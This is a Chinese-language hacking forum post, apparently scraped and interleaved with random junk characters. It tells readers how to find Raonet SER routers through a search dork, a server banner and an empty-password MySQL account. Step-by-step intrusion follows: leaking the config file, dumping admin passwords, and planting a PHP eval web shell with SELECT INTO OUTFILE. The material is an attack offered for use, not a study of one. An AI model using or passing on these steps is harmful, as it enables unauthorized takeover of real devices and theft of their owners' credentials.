寻找存在漏洞的路由器方法:
7 A9 h4 b3 @ v8 L' Z. k2 Y2 J! Q% J/ Z" C- h
1:google搜索'Raonet Subscriber Ethernet Router'6 m& j! Q$ l' H
/ J- E! A* p+ ], o; W2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
/ h0 A( X& k) Y2 r
/ M( t, X+ d+ f) j3 Q- V0 k. P3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
* U+ J$ P" u: F: w7 H0 j8 `
- L) O2 j- ]% m. r1 ^1 `1 m//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
1 G# P( k% x- o& p- L0 H% G+ {; o ^* h- Y
) a/ ]5 _1 Z' w( {& ?) \: I7 W5 I" E" x6 y+ J4 e* G' B' }9 H
入侵步骤:" |% R& l: ~% F8 H
- X+ _8 J; Z: F' [+ T0 _2 C k1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php g, @6 P* T, Q/ i4 @
& v6 m+ Z/ f* }6 T$ w
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
% c j' L& b! ]9 N8 p$ T3:得到密码后连接,查看GUI管理密码:
9 d+ c D8 V" ~2 z+ R3 G0 `1 Uuse ser_500
0 w6 ~6 L* o' P1 N5 m( z6 Xselect id,passwd from user;' }5 r! b2 T( K+ G X
4:通过数据库写入webshell,执行命令:
. a* y% |0 h9 H% zuse mysql;+ V3 w; C, d: x, ^* C/ c' @3 p
create table ok(cmd TEXT);& C. y5 j, M0 q( P7 c3 e4 J! d
insert into ok values("<?php @eval($_POST[cmd])?>");
3 P+ P# x$ u! tselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";1 w9 n( l) V/ A5 h% a
drop table ok;
% O+ Y" _; p7 g' M
2 T! ~5 y- Q( T* p5:连接后门shell.php
6 c2 }9 g. L0 X; ?+ U0 G5 A2 I+ ~/ p8 \. l1 u% K
6. 搞定!
* r6 }. i c0 N5 Y6 e
# j" V4 j$ F* M$ M( `! T5 _ |